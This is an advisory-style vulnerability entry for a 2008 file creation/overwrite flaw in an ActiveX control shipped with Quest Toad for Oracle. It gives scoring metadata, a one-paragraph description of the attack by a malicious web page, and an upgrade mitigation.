Vendor: Toad for Oracle
By: rgod
CVSS: 8.8 (HIGH)
Vulnerability Type: Remote File Creation / Overwrite
CWE: 434
Product Name: Toad for Oracle
Affected Version From: 6.6.1.1115
Affected Version To: 6.6.1.1115
Patch Exists: YES
Related CWE: N/A
CPE: a:quest_software:toad_for_oracle:6.6.1.1115
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite
This vulnerability allows an attacker to create or overwrite a file on the vulnerable system. It exists because an ActiveX control (QExplain2.dll 6.6.1.1115) shipped with Quest Toad for Oracle fails to properly validate user-supplied input. An attacker can exploit it by convincing a user to open a malicious HTML page whose script invokes the control; that script can then be used to create or overwrite a file on the vulnerable system.
Mitigation:
Upgrade to the latest version of Quest Toad for Oracle.